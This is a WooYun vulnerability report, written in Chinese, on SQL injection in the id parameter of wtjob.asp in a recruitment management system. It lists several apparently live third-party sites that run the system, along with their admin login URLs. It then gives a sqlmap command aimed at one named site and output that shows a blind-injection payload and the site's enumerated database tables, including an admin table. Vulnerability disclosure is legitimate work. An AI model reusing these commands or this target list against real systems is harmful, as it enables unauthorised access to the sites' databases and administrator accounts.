WooYun.org

根据 WooYun: 某人才招聘管理系统存在两处sql注入
注入点wtjob.asp?id=
有防注入系统也无视
案例
http://www.yczjw.cn/wtjob.asp?id=21
http://job0514.com/wtjob.asp?id=21
http://www.dtrsrc.com/wtjob.asp?id=21
http://www.tfjyfw.com/wtjob.asp?id=229
http://www.mmhu.cn/wtjob.asp?id=30
http://112.124.28.12/wtjob.asp?id=21
http://www.mdjmg.com/wtjob.asp?id=21
http://www.dykr.com/wtjob.asp?id=3090
挑其中几个后台地址证明一下属于同一套系统
http://www.yczjw.cn/admin/login.asp
http://job0514.com/admin/login.asp
http://www.dtrsrc.com/admin/login.asp
http://www.tfjyfw.com/admin/login.asp
http://www.mmhu.cn/admin/login.asp
测试案例
sqlmap.py -u "http://www.dykr.com/wtjob.asp?id=3090" --tables
sqlmap identified the following injection points with a total of 33 HTTP(s) requ
ests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=3090 AND 8929=8929
---
[18:36:28] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
do you want to use common table existence check? [Y/n/q] y
[18:36:31] [INFO] checking table existence using items from 'C:\Python27\sqlmap\
txt\common-tables.txt'
[18:36:31] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 10
[18:36:34] [INFO] starting 10 threads
[18:36:35] [INFO] retrieved: person
[18:36:38] [INFO] retrieved: admin
[18:36:52] [INFO] retrieved: company
[18:36:54] [INFO] retrieved: system
[18:37:09] [INFO] retrieved: ads
[18:37:15] [INFO] retrieved: job
[18:37:24] [INFO] retrieved: vote
[18:41:18] [INFO] retrieved: ad
Database: Microsoft_Access_masterdb
[8 tables]
+---------+
| ad |
| admin |
| ads |
| company |
| job |
| person |
| system |
| vote |
+---------+